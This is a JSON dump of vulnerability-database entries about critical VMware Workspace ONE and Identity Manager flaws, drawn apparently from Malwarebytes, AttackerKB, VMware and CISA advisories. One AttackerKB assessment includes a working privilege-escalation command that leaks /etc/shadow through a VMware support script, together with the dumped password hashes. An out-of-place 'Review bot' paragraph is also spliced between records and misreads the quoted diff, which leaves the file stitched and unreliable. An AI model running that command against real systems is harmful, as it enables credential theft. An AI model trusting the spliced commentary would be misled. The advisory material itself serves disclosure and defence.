"HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-03T13:00:00", "type": "malwarebytes", "title": "Update now! 
VMWare patches critical vulnerabilities in several products", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-03T13:00:00", "id": "MALWAREBYTES:9E428F767EFCD8CC64A0BC77175C8151", "href": "https://www.malwarebytes.com/blog/news/2022/08/update-now-vmware-patches-critical-vulnerabilities-in-several-products", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-05-19T15:00:35", "description": "The Cybersecurity & Infrastructure Security Agency has issued an Emergency Directive [ED 22-03](<https://www.cisa.gov/emergency-directive-22-03>) and released a [Cybersecurity Advisory (CSA)](<http://www.cisa.gov/uscert/ncas/alerts/aa22-138b>) about ongoing, and expected exploitation of multiple vulnerabilities in several VMware products.\n\n## Chaining unpatched VMware vulnerabilities\n\nThe title of the advisory is \u201cThreat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control\u201d. That's a bit confusing since there are patches available for these vulnerabilities, but threat actors are actively attacking unpatched systems. \n\nThe advisory warns organizations that malicious threat actors, most likely advanced persistent threat (APT) actors, are exploiting CVE-2022-22954 and CVE-2022-22960 separately and in combination.\n\n[**CVE-2022-22954**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22954>): VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. 
A malicious actor with network access can trigger a server-side template injection that may result in remote code execution.\n\nServer-side template injection is when an attacker is able to inject a malicious payload into a template, which is then executed server-side.\n\n[**CVE-2022-22960**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22960>): VMware Workspace ONE Access, Identity Manager, and vRealize Automation contain a privilege escalation vulnerability due to improper permissions in support scripts. A malicious actor with local access can escalate privileges to root.\n\nBoth these vulnerabilities were patched on April 6, 2022. But it took malicious threat actors less than 48 hours to reverse engineer the vendor updates to develop an exploit and start exploiting these disclosed vulnerabilities in unpatched devices.\n\nOn May 18, 2022, CISA said it expects malicious threat actors to quickly develop a capability to exploit CVE-2022-22972 and CVE-2022-22973 as well.\n\n[**CVE-2022-22972**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22972>): is an authentication bypass vulnerability in VMware Workspace ONE Access, Identity Manager and vRealize Automation that affects local domain users. In order to exploit this vulnerability, a remote attacker capable of accessing the respective user interface could bypass the authentication for these various products.\n\n[**CVE-2022-22973**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22973>): is a local privilege escalation vulnerability in the VMware Workspace ONE Access and Identity Manager. In order to exploit this vulnerability, an attacker would need to have local access to the vulnerable instances of Workspace ONE Access and Identity Manager. 
Successful exploitation would allow an attacker to gain \u201croot\u201d privileges.\n\n## Mitigation\n\nCISA strongly encourages all organizations to deploy the updates provided in VMware Security Advisory [VMSA-2022-0014](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>) or remove those instances from networks. CISA added CVE-2022-22954 and CVE-2022-22960 to its [catalog of known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), and federal, executive branch, departments, and agencies were all required to patch those vulnerabilities by May 5 and May 6 respectively. It stands to reason that the two new vulnerabilities will follow suit.\n\nCISA encourages organizations with affected VMware products that are accessible from the Internet to assume they have been compromised and to initiate threat hunting activities. To help with the threat hunting, CISA has provided detection methods and indicators of Compromise (IOCs) in the [CSA](<https://www.cisa.gov/uscert/ncas/alerts/aa22-138b>).\n\nIn the Response Matrix, as listed in the [VMWare advisory](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>), you can find the impacted products and versions.\n\nThe post [VMWare vulnerabilities are actively being exploited, CISA warns](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/vmware-vulnerabilities-are-actively-being-exploited-cisa-warns/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-19T12:42:13", "type": 
"malwarebytes", "title": "VMWare vulnerabilities are actively being exploited, CISA warns", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22960", "CVE-2022-22972", "CVE-2022-22973"], "modified": "2022-05-19T12:42:13", "id": "MALWAREBYTES:76A60CFA2FA67B3D288E8C0349CFEBF8", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/vmware-vulnerabilities-are-actively-being-exploited-cisa-warns/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-06-03T19:56:48", "description": "VMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability due to improper permissions in support scripts. A malicious actor with local access can escalate privileges to \u2018root\u2019.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at May 23, 2022 1:41pm UTC reported:\n\nThere exists a vulnerability within `/usr/local/horizon/scripts/publishCaCert.hzn` where a local attacker can invoke the script to make any file world-readable. The script is intended to facilitate certificate management, allowing cert files to be copied into `/etc/ssl/certs` which is owned by root. The script can be invoked by the `horizon` user without a sudo password.\n\nThe script takes two arguments, the first a path to the file to copy, the second the name of the file to write to the destination. 
The source path argument can be any file, but the destination is only the final component of the path meaning the file will be placed in `/etc/ssl/certs`.\n\nA local user running as `horizon` (such as from successfully exploiting [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954>)) can exploit this vulnerability to recover the shadow file by executing:\n \n \n horizon [ /tmp ]$ sudo /usr/local/horizon/scripts/publishCaCert.hzn /etc/shadow shadow; cat /etc/ssl/certs/shadow\n root:$6$Y49xfSabYZeOAAKr$VN0QQ5IsF1swmo7PmW7SMwFpdxo.RuN2W1FEc/gF814JhnC/KU.FEBMVxDx5aRclwcfp8OYjFqzqNxtb3hQPz.:19131:0:60:7:::\n bin:x:18964:0:60:7:::\n daemon:x:18964:0:60:7:::\n messagebus:x:18964:0:60:7:::\n systemd-bus-proxy:x:18964:0:60:7:::\n systemd-journal-gateway:x:18964:0:60:7:::\n systemd-journal-remote:x:18964:0:60:7:::\n systemd-journal-upload:x:18964:0:60:7:::\n systemd-network:x:18964:0:60:7:::\n systemd-resolve:x:18964:0:60:7:::\n systemd-timesync:x:18964:0:60:7:::\n nobody:x:18964:0:60:7:::\n sshd:!:18964:0:60:7:::\n rabbitmq:!:18964::60::::\n named:!:18964::60::::\n postgres:!:18964:0:60:7:::\n horizon:!:18964:0:60:7:::\n sshuser:$6$1ppozTLmRlrslppH$8XxgQXUSOc.zUBTOkXFdaNR4Cmd2rPhyioLIQ.fiyvdIlMXGvpOWprt8JTZ12NOP1My2xqJpqewfP/BYLqvul1:18964:0:60:7:::\n elasticsearch:!:18964::60::::\n \n\n# Detection\n\nThe file that is written to the `/etc/ssl/certs` directory will still be owned by root making the attacker unable to delete it. A crafty attacker would backup an existing certificate file or create a new one, leak the file of their choosing and then overwrite it again with a legitimate certificate to remove the evidence of their leaked file. Users should look for files out of place in this directory, and inspect timestamps and the certificate contents to identify potential exploitation attempts of this vulnerability.\n\n# Remediation\n\nVMWare patched this issue with hotfix [HW-154129](<https://kb.vmware.com/s/article/88099>). 
The patch for the affected script adds validation to ensure that the argument is a certificate file.\n\nDiff:\n \n \n < . /usr/local/horizon/scripts/hzn-bin.inc\n < openssl x509 -noout -in $CERTFILE 2>/dev/null\n < \n < if [ $? -ne 0 ]; then\n < echo \"ERROR: This is not a certificate file\"\n < exit 1\n < fi\n <\n \n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 2Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T00:00:00", "type": "attackerkb", "title": "CVE-2022-22960", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22960"], "modified": "2022-04-13T00:00:00", "id": "AKB:959B5BD6-9496-432C-AD1F-DB90CB01C12D", "href": "https://attackerkb.com/topics/E62D0oFo6u/cve-2022-22960", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-27T05:06:07", "description": "VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. 
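Review bot: in the quoted hotfix diff, `$CERTFILE` is unquoted in `openssl x509 -noout -in $CERTFILE 2>/dev/null`, so a path containing whitespace or glob characters is word-split before openssl sees it and the check may fail or test a different file than the one later copied; quote it as `"$CERTFILE"`, and prefer `if ! openssl x509 -noout -in "$CERTFILE" 2>/dev/null; then` over testing `$?` on a separate line, so the exit status being checked is unambiguously openssl's. The added lines also validate only that the source parses as an X.509 certificate; nothing in the visible hunk touches the destination-name handling the assessment describes, so a comment in the script stating that the destination is intentionally limited to the final path component inside `/etc/ssl/certs` would make it easier to confirm the fix is complete.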
A malicious actor with network access can trigger a server-side template injection that may result in remote code execution.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at May 02, 2022 10:32pm UTC reported:\n\nWith publicly available information, this was super trivial to exploit! In [the Rapid7 analysis](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis>), I chained it together with what I thought was [CVE-2022-22960](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22960>) (I\u2019m not sure it was anymore) to go from unauthenticated HTTPS access to root very easily.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-06T00:00:00", "type": "attackerkb", "title": "CVE-2022-22954", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22954", "CVE-2022-22960"], "modified": "2022-05-06T00:00:00", "id": "AKB:3191CCF9-DA8E-43DF-8152-1E3A5D1A3C45", "href": "https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-08T23:07:13", "description": "VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at May 26, 2022 9:39pm UTC reported:\n\n[CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis>) came out at nearly the same time, is easier to exploit, and grants access to the underlying OS rather than the web interface. I think that\u2019s going to be the issue that ends up mattering, and this will be overshadowed.\n\nThe biggest problem is that this requires an Internet-facing SSL server, so attacks can\u2019t easily be automated.\n\n**zeroSteiner** at May 26, 2022 6:14pm UTC reported:\n\n[CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis>) came out at nearly the same time, is easier to exploit, and grants access to the underlying OS rather than the web interface. 
I think that\u2019s going to be the issue that ends up mattering, and this will be overshadowed.\n\nThe biggest problem is that this requires an Internet-facing SSL server, so attacks can\u2019t easily be automated.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-26T00:00:00", "type": "attackerkb", "title": "CVE-2022-22972", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22972", "CVE-2022-22973"], "modified": "2022-05-26T00:00:00", "id": "AKB:2BBFFC82-B69B-4A49-9B90-A6E5C745141F", "href": "https://attackerkb.com/topics/Ur2L7rHv2F/cve-2022-22972", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "vmware": [{"lastseen": "2022-11-02T03:01:01", "description": "3a. Authentication Bypass Vulnerability (CVE-2022-31656) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. 
VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. \n\n3b. JDBC Injection Remote Code Execution Vulnerability (CVE-2022-31658) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.0. \n\n3c. SQL injection Remote Code Execution Vulnerability (CVE-2022-31659) \n\nVMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.0. \n\n3d. Local Privilege Escalation Vulnerability (CVE-2022-31660, CVE-2022-31661) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain two privilege escalation vulnerabilities. VMware has evaluated the severity of these issues to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3e. Local Privilege Escalation Vulnerability (CVE-2022-31664) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3f. JDBC Injection Remote Code Execution Vulnerability (CVE-2022-31665) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.6. \n\n3g. URL Injection Vulnerability (CVE-2022-31657) \n\nVMware Workspace ONE Access and Identity Manager contain a URL injection vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.9. 
\n\n3h. Path traversal vulnerability (CVE-2022-31662) \n\nVMware Workspace ONE Access, Identity Manager, Connectors and vRealize Automation contain a path traversal vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3. \n\n3i. Cross-site scripting (XSS) vulnerability (CVE-2022-31663) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a reflected cross-site scripting (XSS) vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 4.7.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-02T00:00:00", "type": "vmware", "title": "VMware Workspace ONE Access, Access Connector, Identity Manager, Identity Manager Connector and vRealize Automation updates address multiple vulnerabilities.", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31663", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-09T00:00:00", "id": "VMSA-2022-0021.1", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0021.1.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-12T17:12:24", "description": "3a. Authentication Bypass Vulnerability (CVE-2022-31656) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. 
VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. \n\n3b. JDBC Injection Remote Code Execution Vulnerability (CVE-2022-31658) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.0. \n\n3c. SQL injection Remote Code Execution Vulnerability (CVE-2022-31659) \n\nVMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.0. \n\n3d. Local Privilege Escalation Vulnerability (CVE-2022-31660, CVE-2022-31661) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain two privilege escalation vulnerabilities. VMware has evaluated the severity of these issues to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3e. Local Privilege Escalation Vulnerability (CVE-2022-31664) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3f. JDBC Injection Remote Code Execution Vulnerability (CVE-2022-31665) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.6. \n\n3g. URL Injection Vulnerability (CVE-2022-31657) \n\nVMware Workspace ONE Access and Identity Manager contain a URL injection vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.9. 
\n\n3h. Path traversal vulnerability (CVE-2022-31662) \n\nVMware Workspace ONE Access, Identity Manager, Connectors and vRealize Automation contain a path traversal vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3. \n\n3i. Cross-site scripting (XSS) vulnerability (CVE-2022-31663) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a reflected cross-site scripting (XSS) vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 4.7.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-02T00:00:00", "type": "vmware", "title": "VMware Workspace ONE Access, Access Connector, Identity Manager, Identity Manager Connector and vRealize Automation updates address multiple vulnerabilities.", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31663", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-02T00:00:00", "id": "VMSA-2022-0021", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0021.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-19T20:02:02", "description": "3a. Server-side Template Injection Remote Code Execution Vulnerability (CVE-2022-22954) \n\nVMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. 
VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. \n\n3b. OAuth2 ACS Authentication Bypass Vulnerabilities (CVE-2022-22955, CVE-2022-22956) \n\nVMware Workspace ONE Access has two authentication bypass vulnerabilities in the OAuth2 ACS framework. VMware has evaluated the severity of these issues to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. \n\n3c. JDBC Injection Remote Code Execution Vulnerabilities (CVE-2022-22957, CVE-2022-22958) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain two remote code execution vulnerabilities. VMware has evaluated the severity of these issues to be in the Critical severity range with a maximum CVSSv3 base score of 9.1. \n\n3d. Cross Site Request Forgery Vulnerability (CVE-2022-22959) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a cross site request forgery vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.8. \n\n3e. Local Privilege Escalation Vulnerability (CVE-2022-22960) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability due to improper permissions in support scripts. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3f. Information Disclosure Vulnerability (CVE-2022-22961) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain an information disclosure vulnerability due to returning excess information. 
VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-06T00:00:00", "type": "vmware", "title": "VMware Workspace ONE Access, Identity Manager and vRealize Automation updates address multiple vulnerabilities.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22955", "CVE-2022-22956", "CVE-2022-22957", "CVE-2022-22958", "CVE-2022-22959", "CVE-2022-22960", "CVE-2022-22961"], "modified": "2022-04-13T00:00:00", "id": "VMSA-2022-0011", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0011.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2023-03-14T18:26:26", "description": "### Summary\n\nActions to take today: \n\u2022 Install fixed builds, updating all affected VMware Horizon and UAG systems to the latest versions. 
If updates or workarounds were not promptly applied following VMware\u2019s [release of updates for Log4Shell](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>) in December 2021, **treat all affected VMware systems as compromised.** \n\u2022 Minimize the internet-facing attack surface by hosting essential services on a segregated demilitarized zone (DMZ), ensuring strict network perimeter access controls, and implementing regularly updated web application firewalls (WAFs) in front of public-facing services.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) and United States Coast Guard Cyber Command (CGCYBER) are releasing this joint Cybersecurity Advisory (CSA) to warn network defenders that cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon\u00ae and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches or workarounds.\n\nSince December 2021, multiple threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and UAG servers. As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2). In one confirmed compromise, these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data.\n\nThis CSA provides the suspected APT actors\u2019 tactics, techniques, and procedures (TTPs), information on the loader malware, and indicators of compromise (IOCs). 
The information is derived from two related incident response engagements and malware analysis of samples discovered on the victims\u2019 networks.\n\nCISA and CGCYBER recommend all organizations with affected systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities using the IOCs provided in this CSA, Malware Analysis Report [MAR-10382580-1](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-174b>), and [MAR-10382254-1](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-174a>). If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to CISA.\n\n**_Update July 18, 2022:_**\n\nThis Cybersecurity Advisory (CSA) has been updated with additional Malware Analysis Report [MAR-10382580-2](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-197a >), which provides additional indicators of compromise (IOCs). \n\n**_Update End_**\n\nSee the list below to download copies of IOCs: \n\n * AA22-174A stix\n * MAR-10382254-1 stix\n * MAR-10382580-1 stix\n * _**Update July 18, 2022:**_ [MAR-10382580-2 stix](<https://www.cisa.gov/uscert/sites/default/files/MAR-10382580.r2.v1.WHITE_stix.xml>)\n\nDownload the pdf version of this report: [pdf, 426 kb]\n\n### Technical Details\n\n**Note: **this advisory uses the [MITRE ATT&CK for Enterprise](<https://attack.mitre.org/versions/v11/matrices/enterprise/>) framework, version 11. See Appendix A for a table of the threat actors\u2019 activity mapped to MITRE ATT&CK\u00ae tactics and techniques.\n\nLog4Shell is a remote code execution vulnerability affecting the Apache\u00ae Log4j library and a variety of products using Log4j, such as consumer and enterprise services, websites, applications, and other products, including certain versions of VMware Horizon and UAG. 
The vulnerability enables malicious cyber actors to submit a specially crafted request to a vulnerable system, causing the system to execute arbitrary code. The request allows the malicious actors to take full control of the affected system. (For more information on Log4Shell, see CISA\u2019s [Apache Log4j Vulnerability Guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) webpage and VMware advisory [VMSA-2021-0028.13](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>).) \n\nVMware made fixes available in December 2021 and confirmed exploitation in the wild on December 10, 2021.[[1](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>)] Since December 2021, multiple cyber threat actor groups have exploited [[T1190](<https://attack.mitre.org/versions/v11/techniques/T1190/>)] Log4Shell on unpatched, public-facing VMware Horizon and UAG servers to obtain initial access [[TA0001](<https://attack.mitre.org/versions/v11/tactics/TA0001/>)] to networks. \n\nAfter obtaining access, some actors implanted loader malware on compromised systems with embedded executables enabling remote C2. These actors connected to known malicious IP address `104.223.34[.]198`.[2] This IP address uses a self-signed certificate with CN `WIN-P9NRMH5G6M8`. In at least one confirmed 